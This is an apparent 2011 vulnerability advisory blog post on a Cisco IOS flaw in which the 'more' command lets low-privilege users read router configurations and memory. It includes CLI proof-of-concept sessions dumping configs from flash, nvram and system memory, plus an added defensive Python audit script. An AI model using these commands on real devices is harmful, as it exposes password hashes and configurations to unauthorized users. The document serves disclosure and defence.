
Tuesday, July 12, 2011

More Cisco, "more" vulnerability

Positive Research has discovered a vulnerability in Cisco devices. The vulnerability allows attackers to bypass certain access restrictions.
The flaw lies in how privileged command restrictions are applied, in particular to the "more" command, which allows attackers to obtain the router configuration stored in the nvram, system (RAM) and flash file systems.
If access to the more command is configured as privilege exec level {number} more, then, unlike commands such as show, access to the file system arguments is propagated to all lower levels, which could allow unauthorized users to read router memory and its file systems nvram, system (RAM) and flash.
Such problems have been detected on IOS routers and switches running versions 12.2, 12.3, 12.4 and 15.0.

Details

IOS 12.2 and 12.3 limit access to the configuration obtainable from system:running-config and prevent reading it directly from router memory (system:memory), but reading the configuration and other files from the router's flash and nvram is not limited.
IOS 12.4 and 15.0, unlike versions 12.2 and 12.3, do not limit access to any of the router's file systems: nvram, system (RAM) and flash.
More details and the fix are available here: http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtk17827


Example 1. How to get the configuration
Cisco 3550-12T (12.2(50)SE)
C3550 Software (C3550-IPSERVICESK9-M), Version 12.2(50)SE


Device configuration:

!
version 12.2
no service pad
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname C3550
!

!
snmp-server community RO
!
control-plane
!
privilege exec level 8 access-template
privilege exec level 8 clear access-template
privilege exec level 8 clear
privilege exec level 3 more
privilege exec level 3 show
!
line con 0
line vty 5 15
!
end


"show" command (low level privileges):

C3550#show running-config
            ^
% Invalid input detected at '^' marker.

C3550#show startup-config
              ^
% Invalid input detected at '^' marker.


"more" command (low level privileges):

C3550#more flash:config.text
!
version 12.2
no service pad
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname C3550
!
enable secret 5
!
username ptuser privilege 3 password 7
aaa new-model

!
snmp-server community RO
!
control-plane
!
privilege exec level 8 access-template
privilege exec level 8 clear access-template
privilege exec level 8 clear
privilege exec level 3 more
privilege exec level 3 show
!
line con 0
line vty 5 15
!
end


So in spite of the fact that access to the device configuration via the show command is restricted, an attacker can obtain the configuration via the "more" command.

Example 2


C3550#more nvram:startup-config
!
version 12.2
no service pad
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname C3550
!
enable secret 5
!
username ptuser privilege 3 password 7
aaa new-model

!
snmp-server community RO
!
control-plane
!
privilege exec level 8 access-template
privilege exec level 8 clear access-template
privilege exec level 8 clear
privilege exec level 3 more
privilege exec level 3 show
!
line con 0
line vty 5 15
!
end



C3550#more system:?
system:default-running-config  system:memory  system:running-config
system:vfiles
C3550#more system:running-config
00000000:  0A210A21 0A210A21 0A210A21 0A656E64    .!.! .!.! .!.! .end
00000010:  0AXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX    .XXX XXXX XXXX XXXX



Example 3. Device memory

An attacker can read Cisco device memory and obtain the command history and configurations via the "more system:memory/main" command.

Command history (including passwords)

How to get the configuration via memory

How to fix
Install a version that is not vulnerable.
Details are available here: http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtk17827
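As an added defender-side check (not part of the original post and not Cisco's tooling), a small Python audit that parses an IOS configuration for a "privilege exec level N more" entry below 15 and flags it, using the affected version list from this post. The sample configuration is constructed from the C3550 configuration in Example 1; the function and regex names are my own.

```python
import re

# Constructed sample: the privilege section of the C3550 configuration shown
# in Example 1, trimmed to the lines this check needs.
SAMPLE_CONFIG = """\
!
version 12.2
hostname C3550
!
privilege exec level 8 clear access-template
privilege exec level 8 clear
privilege exec level 3 more
privilege exec level 3 show
!
end
"""

PRIV_RE = re.compile(r"^privilege exec level (\d+) (.+?)\s*$", re.MULTILINE)
VERSION_RE = re.compile(r"^version (\d+\.\d+)", re.MULTILINE)

# IOS versions the post names as affected by CSCtk17827.
AFFECTED_VERSIONS = {"12.2", "12.3", "12.4", "15.0"}


def audit_more_privilege(config: str) -> dict:
    """Flag an IOS configuration that grants 'more' below privilege level 15.

    Returns the IOS version, the level explicitly configured for 'more'
    (None means no privilege line for it was found) and a list of findings.
    """
    levels = {cmd: int(lvl) for lvl, cmd in PRIV_RE.findall(config)}
    match = VERSION_RE.search(config)
    version = match.group(1) if match else None
    more_level = levels.get("more")
    findings = []
    if more_level is not None and more_level < 15:
        # 'privilege exec level N more' covers every file system argument,
        # so any user at level N or above can read nvram:, system: and flash:.
        findings.append(
            f"'more' granted at level {more_level}: exposes nvram:, system: and flash:"
        )
        if version in AFFECTED_VERSIONS:
            findings.append(f"IOS {version} is in the affected list for CSCtk17827")
    return {"version": version, "more_level": more_level, "findings": findings}


if __name__ == "__main__":
    for line in audit_more_privilege(SAMPLE_CONFIG)["findings"]:
        print(line)
```

Feed it the output of "show running-config" saved from each device to find configurations that lower the level of "more" the way the example above does.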

Vulnerability discovered by: Sergey Pavlov, Roman Ilin (Positive Research Center)

